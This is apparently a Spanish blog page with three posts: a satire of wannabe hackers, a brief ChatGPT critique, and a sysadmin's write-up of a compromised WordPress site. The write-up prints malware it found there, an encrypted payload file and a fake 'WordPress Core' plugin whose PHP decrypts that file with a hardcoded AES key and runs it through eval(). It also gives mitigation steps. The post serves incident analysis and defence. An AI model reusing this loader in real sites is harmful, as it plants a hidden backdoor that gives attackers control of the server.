Tienda
0
artículos sobre seguridad informática y marketing digital

BLOG SEOXAN

Mantente al dia sobre las últimas tendencias en marketing digital y seguridad informática





















Categorias

AR6
Banca Online
buscadores
chatgpt
codigo qr
Correo
Diseño web
dominios
eCommerce
email
Email Marketing
empresa
ficheros
Fraude
Google Ads
Hosting
Inteligencia artificial
Internet
Lazarus Group
Linux
macOS
Marketing Digital
Opinion
Perifericos
Plesk
Posicionamiento SEO
Redes sociales
Sanciones
SCRUM
Seguridad Informática
sftp
Software de facturación
Trucos
User Experience
Utilidades
Ventas
verifactu
woocommerce
Wordpress

Últimas entradas en el blog


El incomprendido genio de la nada

Fecha: 2024-06-25 14:40:25
Autor: Alex Rubio

El incomprendido genio de la nada

En el mundo de la tecnología, donde los verdaderos genios programan su camino hacia la innovación, existe una criatura misteriosa y peculiar: el lammer. El lammer es un entusiasta de la informática... bueno, al menos en su imaginación. Con una confianza digna de un superhéroe de tebeos, cree firmemente en su destino como el próximo Steve Jobs o Mark Zuckerberg. Pero, ¿qué sucede cuando el deseo de poder se encuentra con un alarmante vacío de habilidades? Nos encontramos ante un teatro de operaciones, donde cada acto es una comedia de errores.

El lammer tiene la ambición de un conquistador, soñando con dominar el mundo de la tecnología sin poseer ni un dominio.com a su nombre. Su día a día se compone de lanzar términos como "hackear", "algoritmo" y "big data" en conversaciones, preferiblemente en cafeterías llenas, donde puede impresionar a los incautos que confunden su jerga con sabiduría. Vive en un castillo de arena, construido con promesas de proyectos futuros y empresas imaginarias. Aunque su reino se desmorona con cada ola (o actualización de software), su aspiración de poder permanece inexplicablemente intacta. ¿Quién necesita saber programar cuando puedes pretender dirigir una startup desde la mesa de un Starbucks?

Psicológicamente, el lammer es un optimista incorregible. Ignora la necesidad de conocimiento real como un vegetariano ignora la sección de carnes en un supermercado. En su mundo, la capacidad de buscar en Google es sinónimo de maestría tecnológica. Considera cada fracaso como un "casi éxito" y cada crítica como un halago mal formulado. Después de todo, ¿quién tiene tiempo para aprender de verdad cuando el postureo ofrece tantas gratificaciones instantáneas?

El lammer también es el típico chaval que molesta en la red, infectando websites tipo WordPress, aprovechándose de que la mayoría de plugins están diseñados por otros lammers que creen saber programar pero no alcanzan el nivel necesario para que el código sea seguro. Así, en un círculo vicioso de incompetencia y vanidad, cada lammer refuerza el ego del otro, creando un ecosistema donde la mediocridad es la norma y el verdadero talento es la excepción.

El lammer es un héroe trágico-comedia de la era digital. Aunque sus aspiraciones superan con creces su competencia, su entusiasmo es algo digno de admiración... o al menos de unas risas. Así que la próxima vez que encuentres a un lammer, recuerda: detrás de esa charla tecnológica sin sentido, hay un soñador que confunde "Ctrl+C" y "Ctrl+V" con programación avanzada. ¡Salud por los lammers del mundo, esos eternos optimistas de la tecnología!


Chatgpt no sabe estar callado

Fecha: 2024-06-15 18:42:22
Autor: Alex Rubio

Chatgpt no sabe estar callado

El auge de la inteligencia artificial es, sin lugar a dudas, uno de los temas más candentes de la actualidad. Sin embargo, la prueba que he llevado a cabo demuestra que ChatGPT, una de las IA más avanzadas disponibles, aún no posee la capacidad de mantenerse en silencio cuando es necesario. Siempre ofrece una respuesta para todo, lo cual contrasta significativamente con las reacciones típicamente humanas.

Este comportamiento me lleva a la conclusión de que la inteligencia artificial todavía está lejos de servir a los humanos de una manera verdaderamente coherente y natural. A continuación, presento un ejemplo que ilustra esta limitación.

En este ejemplo, se puede observar cómo ChatGPT insiste en proporcionar una respuesta, aunque la situación ideal requeriría una pausa o un momento de reflexión. Este es un recordatorio de que, a pesar de los impresionantes avances tecnológicos, la emulación de la complejidad y sutileza de las interacciones humanas sigue siendo un desafío significativo para la inteligencia artificial. Aún queda un largo camino por recorrer para que las IA puedan interactuar con nosotros de una forma que se sienta auténtica y verdaderamente útil.

 


Artículo sobre la Infección en WordPress

Fecha: 2024-06-15 17:03:08
Autor: Alex Rubio

Artículo sobre la Infección en WordPress

Como administrador de sistemas, a veces uno se encuentra en situaciones en las que es complicado saber cómo y por qué se ha sufrido una infección. Esto se debe principalmente a la presencia de sitios web que no han sido creados por nosotros y que, a menudo, incorporan "sorpresas" no muy agradables. En este caso, y como en la mayoría de los casos, se trata de un WordPress, donde la falta de instalación o actualización de los plugins ha permitido a los hackers acceder al sistema.

El hecho de que cualquiera pueda instalar plugins de WordPress es muy democrático, pero tiene sus desventajas. No todos los creadores de plugins son buenos programadores y, diariamente, se descubren plugins vulnerables. Los usuarios o clientes de la web no suelen entender que un sitio web parece estar "vivo" y que no es fácil mantenerlo libre de código mal hecho o de creadores que han dejado de dar soporte. El mundo gratuito democratiza, pero complica la seguridad, ya que no hay que confundir el voluntarismo con el profesionalismo.

Así pues, este es uno de los casos que me he encontrado. El hecho de que los hackers puedan subir archivos a la estructura de WordPress hace que nos encontremos con archivos php.ini como este:

Archivos .htaccess modificados o insertados en innumerables directorios para otorgar permisos de ejecución a programas que no deberían tenerlos, como este comando en .htaccess:

DirectoryIndex index.php index.html index.htm
 

El comando DirectoryIndex en el archivo .htaccess especifica qué archivos debe buscar el servidor web cuando se accede a un directorio sin especificar un archivo concreto. En este caso, la línea:

indica al servidor que, al acceder a un directorio, debe buscar primero un archivo llamado index.php. Si no encuentra ese archivo, buscará uno llamado index.html. Si tampoco encuentra ese, buscará index.htm. Este orden de búsqueda permite a los administradores del sitio web controlar qué archivo se muestra por defecto cuando se accede a un directorio.

También es fácil encontrar plugins que, aparentemente, tienen nombres rimbombantes y lógicos, usando la ingeniería social para no llamar la atención. Hoy me he encontrado con uno de esos casos. ¿Quién dudaría de un plugin llamado "WordpressCore" o de uno llamado "google-seo-rank"? ¡Ay, Dios mío! ¡Alma de cántaro! ¿Quién te iba a decir que las cosas serían así...?

Estos plugins, además de asegurarse el control de la web para siempre, engañan a los usuarios mediante una llamada externa a un JavaScript, haciendo aparecer un mensaje de que tienen un problema con el navegador. Por supuesto, cada vez están mejor diseñados. Luego, hacen que los usuarios ejecuten un comando con privilegios de administrador para infectar sus máquinas. Aquí tienes un ejemplo de uno de esos encantadores scripts:

https://cdn.ethers.io/lib/ethers-5.2.umd.min.js

Medidas de Mitigación

Para mitigar esta amenaza:

  1. Eliminar los Archivos Maliciosos: Inmediatamente eliminar los archivos php.ini, .htaccess, include.php, los archivos .txt sospechosos y el plugin google-seo-rank asi como el WoprdpressCore
  2. Revisar Configuraciones de PHP: Asegurarse de deshabilitar funciones peligrosas y restringir el acceso a directorios.
  3. Actualizar Plugins y Temas: Mantener todos los plugins y temas actualizados.
  4. Monitoreo y Auditoría: Implementar soluciones para detectar cambios no autorizados.
  5. Escaneo de Malware: Utilizar herramientas de escaneo de malware para identificar y eliminar código malicioso.

Ejemplo de ficheros .txt con contenido malicioso:


R9ir+PJYkX98tjPI4LYFFw==

kvEf4UKzNsfWCXAgWVMZZuM1wklOwQ61oz0zp7HLWoNgyJ6xXBcfPj/VunrYkI088/T+ybU68Q0dmS0utVONQiFouBH/mjfkv6ClxqMUdJiCaN2khi5sbuHmGYeQF46QIU/UKYBzNH0gDXw10Q340SV40a6kpLvSqtEYG6jX6DalY+nI4pQ1jaSdDlV7yC7oYsVsSeZR7zapMNU8vf9VYi1/E0ph3BPDNaE0NEhWhF0DDN4eVN0lZUTox7uv+IZMZicVj+GnecYDNMUOLkRqFCgmhZZdZ4/3JYf6Yqy6xDwjzGialvwnxvxOeJuuCJ4Y4re7NZEoTVTSKY1eahbr+BOc9JB9GrAPI+oBladyxY5/C34FkyOkq1LdN0OfqjLq+LAf8onH491bXR0nQ0eBxUaIFIP8u1Y0b2WQIO2ayV6zcnCOrUF0kKLT3Vn2FB9mUqjRtg3ukY8gadTCEqNnT+5hpIILi0qhWAzMjs1FyI+HA1HR2hUf+Tm+IT818/DREH6ugnJcxwJARRQNetpYN3KO+EJcll2kbRtpIROgSb1HjdtUVIR0O12U/yjhI3IQLPQT7fcXQkDM+JzY/CfY4ljJSgRsRFmI626v9Vxz8qWWjUoqbvBDDTpl8DiCC/F/qua6tkHzVqan5dho7AH7hVdJPcn74ncQKi4SbDdY2VA/epSjdFi2zrXI8KrD0HbJsmhL76Jh"

 

Que despues es decodificado mediante codigo php como este:


/**
 * @package Wordpress_Core
 * @version 1.7.3
 */
/*
Plugin Name: WordPress Core
Plugin URI: https://wordpress.org/plugins/
Description: This is core plugin for managment WordPress.
Version: 1.7.3
Author URI: https://wordpress.org/
*/
class UnsafeCrypto
{
 const METHOD = "aes-256-ctr";
 public static function decrypt($message, $nonce, $key, $encoded = false)
 {
  if ($encoded) {
   $message = base64_decode($message, true);
   $nonce = base64_decode($nonce, true);
   if ($message === false || $nonce === false) {
    throw new Exception('Encryption failure');
   }
  }
  $plaintext = openssl_decrypt(
   $message,
   self::METHOD,
   $key,
   OPENSSL_RAW_DATA,
   $nonce
  );
  return $plaintext;
 }
}
$key = hex2bin('af64a08c9cf0b2070726e52e2fb78f02a9615726758db69ad8d9de140806707c');
$parts = file('./vwbulbzhnj.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$decrypted = UnsafeCrypto::decrypt($parts[1], $parts[0], $key, true);
eval($decrypted);